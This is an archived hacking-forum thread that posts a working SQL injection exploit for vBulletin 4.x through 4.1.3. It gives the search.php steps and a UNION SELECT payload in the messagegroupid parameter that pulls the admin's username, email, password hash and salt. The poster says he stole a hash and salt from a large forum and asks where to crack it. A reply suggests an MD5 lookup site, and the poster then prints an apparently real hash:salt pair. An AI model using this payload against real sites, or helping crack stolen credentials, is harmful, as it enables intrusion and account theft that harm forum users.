This forum is in archive mode. You will not be able to post new content.
Pages: [1]

Author Topic: Vbulletin 4.x.x => 4.1.3 SQL injection Vulnerability  (Read 5025 times)

0 Members and 2 Guests are viewing this topic.

Offline noob

  • Knight
  • **
  • Posts: 202
  • Cookies: 29
    • View Profile
Vbulletin 4.x.x => 4.1.3 SQL injection Vulnerability
« on: July 25, 2011, 04:24:33 AM »
Vulnerability:
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.Exploitation:
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id
Code: [Select]
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
P.S.I have hash and salt from some big forum,can anyone suggest me good site to crack it?
Temporary doing cracking with PasswordPro,its look like it take a long time... :(
« Last Edit: July 25, 2011, 04:45:28 AM by noob »
Report to moderator   Logged

Offline hacker@sr.gov.yu

  • VIP
  • Peasant
  • *
  • Posts: 142
  • Cookies: 25
  • Tools don't make hackers, hackers make tools!
    • View Profile
Re: Vbulletin 4.x.x => 4.1.3 SQL injection Vulnerability
« Reply #1 on: July 25, 2011, 12:29:43 PM »
If it is md5 then use:
Code: [Select]
http://www.md5decrypter.co.uk
;)
Report to moderator   Logged

Offline noob

  • Knight
  • **
  • Posts: 202
  • Cookies: 29
    • View Profile
Re: Vbulletin 4.x.x => 4.1.3 SQL injection Vulnerability
« Reply #2 on: July 25, 2011, 05:38:34 PM »
Code: [Select]
ed1700a9bc49fd24407ce45e9d8e1326:)9cb>o>EWy856t^E&&mZplx%m&>vtP This is the passwrd:salt
Report to moderator   Logged
Pages: [1]
 



Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.